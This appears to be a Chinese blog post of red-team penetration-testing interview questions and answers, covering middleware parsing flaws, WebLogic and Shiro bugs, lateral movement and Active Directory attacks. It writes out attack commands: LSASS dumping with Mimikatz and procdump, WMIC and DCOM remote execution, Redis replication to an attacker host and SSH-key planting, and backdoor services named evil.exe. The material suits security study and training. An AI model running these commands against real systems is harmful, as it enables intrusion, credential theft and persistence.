2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
渗透测试红队面试八
二百一十一、常见中间件解析漏洞利用方式
二百一十二、MySQL用户密码存储与加密
二百一十三、Linux系统加固降权思路
二百一十四、绕过CDN获取真实IP
二百一十五、CMD查询远程开放端口
二百一十六、查找域控方法
二百一十七、CSRF成因及防御(非Token方案)
二百一十八、打点常用漏洞
二百一十九、Shiro漏洞发现方法
二百二十、WebLogic权限绕过
二百二十一、Fastjson漏洞原理
二百二十二、WebLogic漏洞类型
二百二十三、IIOP协议与类似技术
二百二十四、不出网漏洞利用方法
二百二十五、Webshell不出网应对措施
二百二十六、DNS出网协议利用
二百二十七、横向渗透命令执行手段
二百二十八、PsExec与WMIC区别
二百二十九、DCOM远程执行操作
二百三十、密码抓取方法
二百三十一、密码抓取版本限制
二百三十二、抓不到密码的应对
二百三十三、域内攻击方法
二百三十四、NTLM验证机制
二百三十五、Kerberos票据攻击
二百三十六、Windows Redis利用
二百三十七、Linux Redis利用
二百三十八、Windows后门方式
二百三十九、CS的哈希与密码获取
二百四十、收集RDP记录及对抗杀软
渗透测试红队面试八
二百一十一、说说常见的中间件解析漏洞利用方式二百一十二、mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?二百一十三、Windows、Linux、数据库的加固降权思路,任选其一二百一十四、如何绕过CDN获取目标网站真实IP,谈谈你的思路?二百一十五、CMD命令行如何查询远程终端开放端口二百一十六、怎么查找域控二百一十七、CSRF 成因及防御措施;如果不用 token 如何做防御?二百一十八、打点一般会用什么漏洞二百一十九、平常怎么去发现shiro漏洞的二百二十、weblogic权限绕过有没有了解二百二十一、fastjson漏洞利用原理二百二十二、weblogic有几种漏洞二百二十三、IIOP听说过吗,和什么类似二百二十四、这几个漏洞不出网情况下怎么办二百二十五、拿到webshell不出网情况下怎么办二百二十六、dns出网协议怎么利用二百二十七、横向渗透命令执行手段二百二十八、psexec和wmic或者其他的区别二百二十九、Dcom怎么操作?二百三十、抓取密码的话会怎么抓二百三十一、什么版本之后抓不到密码二百三十二、抓不到的话怎么办二百三十三、域内攻击方法有了解过吗二百三十四、ntlm验证机制二百三十五、kerberos认证黄金、白银票据制作原理,以及需要哪个值二百三十六、window redis 需要有哪些利用手段,除了写文件和启动项二百三十七、linux redis 写有哪些利用方式二百三十八、windows后门包括哪些方式二百三十九、cs hashdump和logonpasswd 分别从哪里读取哈希和密码二百四十、如何收集rdp连接记录,如果有杀软怎么办
二百一十一、常见中间件解析漏洞利用方式
- IIS解析漏洞
- 目录解析:
/test.asp;.jpg
被解析为ASP脚本(IIS6.0)。- 分号截断:
test.asp;.jpg
利用分号绕过扩展名检查。- PUT写文件:通过HTTP PUT方法上传脚本文件(需配置不当)。
- Apache解析漏洞
- 多后缀解析:
test.php.xxx
若.xxx
未定义,按最后一个有效后缀解析(如.php
)。.htaccess
覆盖:上传自定义.htaccess
设置解析规则(如AddType application/x-httpd-php .jpg
)。- Nginx解析漏洞
- 路径解析错误:
/test.jpg/test.php
将test.jpg
作为PHP执行(Nginx + PHP-FPM配置不当)。- CVE-2013-4547:利用未正确处理空格和
\0
字符绕过检查(如test.jpg \0.php
)。
二百一十二、MySQL用户密码存储与加密
- 存储位置
- 表名:
mysql.user
表存储用户名、主机权限及密码哈希。- 字段:
authentication_string
(MySQL 5.7+)或password
(旧版)。- 加密方式
- MySQL 4.1+:双重SHA1加密(
SHA1(SHA1(password))
)。- MySQL 8.0+:默认使用
caching_sha2_password
插件(SHA256哈希)。- 补充信息
- 查询用户权限:
SELECT user, host, authentication_string FROM mysql.user;
- 身份验证插件变更可能导致旧客户端兼容性问题(需启用
mysql_native_password
)。
二百一十三、Linux系统加固降权思路
- 最小权限原则
- 用户权限:创建低权限用户运行服务(如
www-data
运行Web服务)。- SUID/SGID清理:
find / -perm /4000 -o -perm /2000
查找并删除非必要特权文件。- 服务与网络加固
- 禁用无用服务:
systemctl disable vsftpd
关闭FTP等非必要服务。- 防火墙规则:
iptables
限制仅开放必要端口(如SSH仅允许特定IP)。- 文件系统安全
- 敏感文件权限:
chmod 600 /etc/shadow
限制访问。- SELinux/AppArmor:启用强制访问控制,限制进程权限。
二百一十四、绕过CDN获取真实IP
- 历史记录查询
- DNS历史:通过SecurityTrails、ViewDNS查询历史解析记录。
- IP数据库:使用Censys或Shodan搜索目标域名早期绑定的IP。
- 子域名探测
- 爆破子域:
subfinder
或amass
发现未使用CDN的子域(如dev.example.com
)。- 邮件服务器:分析邮件头中
Received
字段获取服务器IP。- 主动探测技巧
- SSRF漏洞:利用目标站点的SSRF读取内网元数据(如AWS的
169.254.169.254
)。- 全网段扫描:对目标域名解析的CDN IP段进行端口扫描,寻找非标准端口服务。
二百一十五、CMD查询远程开放端口
- 基础命令
- Telnet:
telnet <IP> <端口>
(若连接成功则端口开放)。- Netstat:
netstat -ano | findstr "ESTABLISHED"
查看本地连接。- PowerShell工具
- Test-NetConnection:
Test-NetConnection <IP> -Port <端口>
显示端口状态。- 第三方工具
- Nmap:
nmap -p 1-1000 <IP>
扫描指定端口范围。- PortQry:微软工具,支持批量端口检测。
二百一十六、查找域控方法
- DNS查询
- SRV记录:
nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>
定位域控的LDAP服务。- 系统命令
- nltest:
nltest /dclist:<域名>
列出域控列表。- net命令:
net group "Domain Controllers" /domain
查询域控组。- LDAP查询
- PowerShell:
powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address
二百一十七、CSRF成因及防御(非Token方案)
- 漏洞成因
- 浏览器自动携带Cookie:攻击者诱导用户访问恶意页面,触发跨站请求。
- 无二次验证:敏感操作未校验请求来源。
- 防御措施(非Token)
- SameSite Cookie:设置
SameSite=Strict
限制跨站请求。- Referer验证:检查HTTP头
Referer
是否来自合法域名。- CAPTCHA验证:关键操作前要求用户输入验证码。
二百一十八、打点常用漏洞
- Web漏洞
- SQL注入:通过注入获取数据库权限(如后台管理员凭证)。
- 文件上传:上传Webshell控制服务器(如绕过类型检查)。
- 服务漏洞
- 未授权访问:Redis、MongoDB等直接执行命令。
- RCE漏洞:如Log4j2、Fastjson反序列化。
- 配置缺陷
- 默认密码:Tomcat、Jenkins等管理界面弱口令。
- SSRF:利用内网探测或元数据服务攻击。
二百一十九、Shiro漏洞发现方法
- Cookie特征识别
- RememberMe字段:Base64解码后开头为
x01x02x03
或x04
(序列化数据特征)。- 漏洞扫描工具
- ShiroExploit:自动化检测密钥及反序列化漏洞。
- Burp插件:
ShiroScan
检测Cookie有效性。- 手工检测
- 密钥爆破:利用已知密钥列表(如kPH+bIxk5D2deZiIxcaaaA==)测试反序列化。
- DNSLog验证:构造恶意序列化数据触发DNS请求,确认漏洞存在。
二百二十、WebLogic权限绕过
- CVE-2020-14882
- 未授权访问:访问
/console/css/%252e%252e%252fconsole.portal
绕过控制台认证。- 利用工具:
weblogic-framework
直接执行命令。- CVE-2021-2109
- 管理接口绕过:通过构造特殊URL路径访问后台功能。
- 修复建议
- 更新补丁,限制管理接口访问IP,启用强认证机制。
二百二十一、Fastjson漏洞原理
- 反序列化机制
- @type指定类:攻击者通过JSON中的
@type
指定恶意类触发Gadget链。- JNDI注入:利用
com.sun.rowset.JdbcRowSetImpl
等类加载远程恶意代码。- 漏洞版本
- <=1.2.24:默认支持autoType,可直接利用。
- 1.2.25-1.2.47:需绕过autoType检查(如利用
L
前缀或特殊类名)。- 防御方案
- 升级至1.2.83+版本,关闭autoType功能,使用白名单机制。
二百二十二、WebLogic漏洞类型
- 反序列化漏洞
- T3协议:CVE-2018-2628利用T3反序列化执行命令。
- XMLDecoder:CVE-2017-10271通过WLS组件触发。
- SSRF漏洞
- CVE-2014-4210:
uddiexplorer
组件未限制内网请求。- 权限绕过
- CVE-2020-14825:绕过Console组件权限校验。
二百二十三、IIOP协议与类似技术
- IIOP协议
- 用途:CORBA的通信协议,用于分布式对象调用。
- 类似技术:与RMI(Java远程方法调用)类似,均涉及序列化数据传输。
- 漏洞利用
- 反序列化攻击:通过IIOP传输恶意对象触发Gadget链(如WebLogic CVE-2020-2551)。
二百二十四、不出网漏洞利用方法
- DNS/ICMP隧道
- DNS协议:使用
dnscat2
通过DNS查询传输数据。- ICMP协议:利用
ptunnel
或icmpsh
建立隐蔽通道。- 内网服务中继
- SMB Relay:通过Responder工具捕获NTLM哈希并中继至其他主机。
- Web反向连接
- HTTP文件传输:通过Web服务上传/下载文件(如Python
http.server
)。
二百二十五、Webshell不出网应对措施
- 内网探测
- 扫描内网段:使用
for /L %i in (1,1,255) do ping -n 1 192.168.1.%i
发现存活主机。- 利用现有服务
- 数据库外联:通过MySQL
SELECT ... INTO OUTFILE
写入Web目录。- 邮件发送:使用SMTP协议将数据外传。
- 内存加载
- PowerShell脚本:反射加载恶意代码,避免落地文件。
二百二十六、DNS出网协议利用
- DNS隧道
- 工具:
dnscat2
建立加密隧道,执行命令或传输文件。- 隐蔽性:利用TXT或CNAME记录传输数据,绕过防火墙检测。
- 数据渗透
- 子域名携带数据:
data.example.com
解析为Base64编码的敏感信息。
二百二十七、横向渗透命令执行手段
- PsExec
- 特点:需目标开启ADMIN$共享,生成服务执行命令,日志明显。
- WMI
- 命令:
wmic /node:<IP> process call create "cmd.exe /c whoami"
- 优势:无需安装客户端,基于135端口。
- SSH密钥利用
- 条件:获取目标SSH私钥,通过
ssh -i id_rsa user@ip
直接登录。
二百二十八、PsExec与WMIC区别
PsExec WMIC 需目标开启ADMIN$共享和文件写入权限。 仅需135端口和有效凭证,无需文件操作。 生成服务进程,日志记录明显(svchost)。 通过WMI协议执行,日志较隐蔽。 适合批量操作,但易触发告警。 更隐蔽,但命令长度受限。
二百二十九、DCOM远程执行操作
- 原理
- DCOM接口:通过COM对象远程调用方法(如MMC20.Application)。
- 利用步骤
- 列出DCOM对象:
Get-CimInstance Win32_DCOMApplication
- 执行命令:
powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
二百三十、密码抓取方法
- Mimikatz
- 命令:
sekurlsa::logonpasswords
提取内存中的明文密码和哈希。- 注册表导出
- SAM/SYSTEM文件:
reg save HKLM\SAM SAM.bak
导出后使用secretsdump解析。- Procdump转储
- 转储LSASS:
procdump.exe -ma lsass.exe lsass.dmp
,本地用Mimikatz解析。
二百三十一、密码抓取版本限制
- Windows 8.1/Server 2012+
- WDigest禁用:默认不缓存明文密码(需启用注册表项
UseLogonCredential
)。- Windows 10/Server 2016+
- LSASS保护:启用Credential Guard后无法直接读取内存密码。
二百三十二、抓不到密码的应对
- 哈希传递(Pass-the-Hash)
- 工具:
psexec.py
或crackmapexec
使用NTLM哈希横向移动。- Kerberos票据
- 黄金票据:利用krbtgt哈希伪造TGT,访问任意服务。
二百三十三、域内攻击方法
- 横向移动
- MS17-010:利用永恒之蓝漏洞攻击未修补主机。
- 权限提升
- ACL滥用:修改域对象的ACL,授予自身特权(如DCsync权限)。
- 持久化
- Skeleton Key:植入恶意域控后门,使用万能密码登录。
二百三十四、NTLM验证机制
- 三步握手
- 协商:客户端发送NEGOTIATE_MESSAGE。
- 挑战:服务器返回CHALLENGE_MESSAGE(包含随机Nonce)。
- 认证:客户端使用密码哈希加密Nonce生成RESPONSE_MESSAGE。
- 中间人攻击
- NTLM Relay:将认证请求中继至其他服务器,执行命令或获取权限。
二百三十五、Kerberos票据攻击
- 黄金票据
- 原理:伪造TGT票据,需krbtgt的NTLM哈希和域SID。
- 用途:访问域内任意服务。
- 白银票据
- 原理:伪造特定服务的ST票据,需服务账户哈希和服务SPN。
- 用途:仅限访问特定服务(如CIFS文件共享)。
二百三十六、Windows Redis利用
- 主从复制RCE
- 步骤:设置恶意主节点,同步
module.dll
执行命令。- 命令:
bash
redis-cli -h <target> SLAVEOF <attacker-ip> 6379
- 计划任务劫持
- 写入任务:通过
CONFIG SET dir
和dbfilename
写入恶意任务文件。
二百三十七、Linux Redis利用
- SSH密钥写入
- 命令:
bas
redis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save
- Crontab后门
- 写入任务:设置定时任务反弹Shell。
二百三十八、Windows后门方式
- 注册表启动项
- 路径:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- 计划任务
- 命令:
schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart
- 服务后门
- 创建服务:
sc create EvilService binPath= "C:\evil.exe" start= auto
二百三十九、CS的哈希与密码获取
- hashdump
- 来源:从LSASS进程内存中提取NTLM哈希。
- logonpasswords
- 来源:从Windows凭据管理器获取明文密码(需WDigest启用)。
二百四十、收集RDP记录及对抗杀软
- 记录位置
- 注册表:
HKCU\Software\Microsoft\Terminal Server Client\Servers
- 日志文件:
%USERPROFILE%\Documents\Default.rdp
- 绕过杀软
- 离线提取:直接复制注册表文件或日志到本地分析。
- 隐蔽工具:使用PowerShell脚本读取注册表,避免触发行为检测。
相关文章:

2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 渗透测试红队面试八 二百一十一、常见中间件解析漏洞利用方式 二百一十二、MySQL用户密码存储与加密 …...

MiniMind:3块钱成本 + 2小时!训练自己的0.02B的大模型。minimind源码解读、MOE架构
大家好,我是此林。 目录 1. 前言 2. minimind模型源码解读 1. MiniMind Config部分 1.1. 基础参数 1.2. MOE配置 2. MiniMind Model 部分 2.1. MiniMindForCausalLM: 用于语言建模任务 2.2. 主干模型 MiniMindModel 2.3. MiniMindBlock: 模型的基本构建块…...

如何进行前端性能测试?--性能标准
如何进行前端性能测试?–性能标准 前端性能测试指标: 首次加载阶段 场景:用户首次访问网页,在页面还未完全呈现各种内容和功能时的体验。重要指标及原因 首次内容绘制(FCP - First Contentful Paint)…...

通信网络编程——JAVA
1.计算机网络 IP 定义与作用 :IP 地址是在网络中用于标识设备的数字标签,它允许网络中的设备之间相互定位和通信。每一个设备在特定网络环境下都有一个唯一的 IP 地址,以此来确定其在网络中的位置。 分类 :常见的 IP 地址分为 I…...

Off-Policy策略演员评论家算法SAC详解:python从零实现
引言 软演员评论家(SAC)是一种最先进的Off-Policy策略演员评论家算法,专为连续动作空间设计。它在 DDPG、TD3 的基础上进行了显著改进,并引入了最大熵强化学习的原则。其目标是学习一种策略,不仅最大化预期累积奖励&a…...

热门CPS联盟小程序聚合平台与CPA推广系统开发搭建:助力流量变现与用户增长
一、行业趋势:CPS与CPA模式成流量变现核心 在移动互联网流量红利见顶的背景下,CPS(按销售付费)和CPA(按行为付费)模式因其精准的投放效果和可控的成本,成为企业拉新与用户增长的核心工具。 CPS…...
(自用)Java学习-5.9(Thymeleaf,自动装配,自定义启动器 )
一、Thymeleaf 模板技术 片段定义与复用 <!-- 声明片段 --> <div th:fragment"b1">...</div> <!-- 插入片段 --> <div th:insert"~{bottom :: b1}"></div> <!-- 追加内容 --> <div th:replace"~{botto…...

Linux系统管理与编程15:vscode与Linux连接进行shell开发
兰生幽谷,不为莫服而不芳; 君子行义,不为莫知而止休。 【1】打开vscode 【2】点击左下角连接图标 【3】输入远程连接 选择合适的操作系统 输入密码,就进入Linux环境的shell编程了。 在vscode下面粘贴拷贝更方便。比如 然后在v…...

RabbitMQ概念详解
什么是消息队列? 消息队列是一种在应用程序之间传递消息的技术。它提供了一种异步通信模式,允许应用程序在不同的时间处理消 息。消息队列通常用于解耦应用程序,以便它们可以独立地扩展和修改。在消息队列中,消息发送者将消息发送…...
Excel-to-JSON插件专业版功能详解:让Excel数据转换更灵活
前言 在数据处理和系统集成过程中,Excel和JSON格式的转换是一个常见需求。Excel-to-JSON插件提供了一套强大的专业版功能,能够满足各种复杂的数据转换场景。本文将详细介绍这些专业版功能的应用场景和使用方法。 订阅说明 在介绍具体功能之前…...

linux基础操作5------(shell)
一.前言 本文来介绍一下linux的shell,除了最后的那个快捷键,其他的还是做一个了解就行了。 Shell: 蛋壳的意思,是linux中比较重要的一个概念,所有的命令其实都称之为shell命令。 看图解:shell就是内核的一…...

BUUCTF 大流量分析(三) 1
BUUCTF:https://buuoj.cn/challenges 文章目录 题目描述:密文:解题思路:flag: 相关阅读 CTF Wiki BUUCTF | 大流量分析 (一)(二)(三) 题目描述: …...
feign.RequestInterceptor 简介-笔记
1. feign.RequestInterceptor 简介 Feign 是一个声明式 Web 服务客户端,用于简化 HTTP 请求的编写与管理。feign.RequestInterceptor 是 Feign 提供的一个接口,用于在请求发出之前对其进行拦截和修改。这在微服务架构中非常有用,比如在请求中…...

vLLM中paged attention算子分析
简要分析vLLM中PA的代码架构和v1与v2的区别 vLLM版本:0.8.4 整体结构分析 首先从torch_bindings.cpp入手分析: 这里可以看到vLLM向pytorch中注册了两个PA算子:v1和v2 其中paged_attention_v1和paged_attention_v2分别实现在csrc/attentio…...

多样本整合Banksy空间聚类分析(Visium HD, Xenium, CosMx)
在空间数据分析中,传统的单细胞聚类算法,例如Seurat和Scanpy中的lovain和leiden等聚类算法,通常在处理空间数据时忽略了空间信息。然而,由于细胞状态受其周围细胞的影响,将转录组数据与细胞的空间信息结合起来进行聚类…...
C++:公有,保护及私有继承
从已有的类派生出新的类,而派生类继承了原有类的特征被称为类继承。下面按照访问权限分别介绍公有继承,私有继承与保护继承。 公有继承 使用公有继承,基类的公有成员将成为派生类的公有成员(派生类对象可直接调用方法)…...
ElasticSearch聚合操作案例
1、根据color分组统计销售数量 只执行聚合分组,不做复杂的聚合统计。在ES中最基础的聚合为terms,相当于 SQL中的count。 在ES中默认为分组数据做排序,使用的是doc_count数据执行降序排列。可以使用 _key元数据,根据分组后的字段数…...

使用 OAuth 2.0 保护 REST API
使用 OAuth 2.0 保护 REST API 使用 OAuth 2.0 保护 REST API1.1 不安全的api1.2 安全默认值安全默认值Spring Security 默认值 需要对所有请求进行身份验证Servlet、过滤器和调度程序安全优势 使用所有请求的安全标头进行响应缓存标头 严格传输安全标头内容类型选项需要对所有…...

解决下拉框数据提交后回显名称不对
问题背景描述 页面组件使用 antd 的 Select 组件,下拉框的 options 数据是动态获取的,基本就是有value 和 label 属性的对象数组。 提交数据后,我们有一个保存草稿的操作,支持返回或者刷新页面,浏览其他页面之后通过其…...

lenis滑动插件的笔记
官网 lenis - npm 方法一:基础判断(推荐) 通过 Lenis 自带的 scroll 和 limit 属性直接判断: const lenis new Lenis()// 滚动事件监听 lenis.on(scroll, ({ scroll, limit }) > {const distanceToBottom limit - scroll…...
基于Python的高效批量处理Splunk Session ID并写入MySQL的解决方案
已经用Python实现对Splunk通过session id获取查询数据,现在要实现Python批量数据获取,通过一个列表中的大量Session ID,快速高效地获取一个数据表,考虑异常处理,多线程和异步操作以提高性能,同时将数据表写…...

Android Framework
Android 分区 /boot:存放引导程序,包括内核和内存操作程序。/system:相当于电脑 C 盘,存放 Android 系统及系统应用。/recovery:恢复分区,可以进入该分区进行系统恢复。/data:用户数据区&#…...
JVM对象分配与程序崩溃排查
一、new 对象在 JVM 中的过程 在 JVM 中通过 new 关键字创建对象时,会经历以下步骤: 内存分配 对象的内存分配在 堆(Heap) 中,优先在 新生代(Young Generation) 的 Eden 区 分配。分配方式取决…...

OpenMCU(六):STM32F103开发板功能介绍
概述 距上一篇关于STM32F103的FreeRTOS博客的发布已经过去很长时间没有更新了。在这段时间内,大家可以看到博主发表了一系列的关于使用qemu 模拟实现STM32F103的博客,博主本来想借助qemu开发stm32F103相关的一些软件功能,博主开发出来并成功运…...
(自用)Java学习-5.12(Redis,B2C电商)
一、Redis 核心知识 缓存作用 提升性能:内存读写速度(读 10w/s,写 8w/s)远超 MySQL(读 3w/s,写 2w/s)减少数据库压力:通过内存缓存热点数据,避免频繁 SQL 查询分类&#…...

Rspack:字节跳动自研 Web 构建工具-基于 Rust打造高性能前端工具链
字节跳动开源了一款采用 Rust 开发的前端模块打包工具:Rspack(读音为 /ɑrspk/)。 据介绍,Rspack 是一个基于 Rust 的高性能构建引擎,具备与 Webpack 生态系统的互操作性,可以被 Webpack 项目低成本集成&a…...
深度解析LLM参数:Top-K、Top-p和温度如何影响输出随机性?
许多大模型具有推理参数,用于控制输出的“随机性”。常见的几个是 Top-K、Top-p,以及温度。 Top-p: 含义:Kernel sampling threshold. Used to determine the randomness of the results. The higher the value, the stronger t…...

高速系统设计实例设计分析
在上几章的内容中,我们从纯粹高速信号的理论分析,到 Cadence 工具的具体使用都做了详细的讲解和介绍。相信读者通过前面章节的学习,已经对高速系统的设计理念及 Cadence 相应的设计流程和工具有了一个基本的认识。但是,对于高速电…...

查看购物车
一.查看购物车 查看购物车使用get请求。我们要查看当前用户的购物车,就要获取当前用户的userId字段进行条件查询。因为在用户登录时就已经将userId封装在token中了,因此我们只需要解析token获取userId即可,不需要前端再传入参数了。 Control…...
疑难杂症:dex安装部署
方式一、源码包下载 wget https://github.com/dexidp/dex/archive/refs/tags/v2.42.1.tar.gz 方式二、git方式拉取源码编译: Getting Started | $ git clone https://github.com/dexidp/dex.git 编译 $ cd dex/ $ make build 启动 ./bin/dex serve examples/…...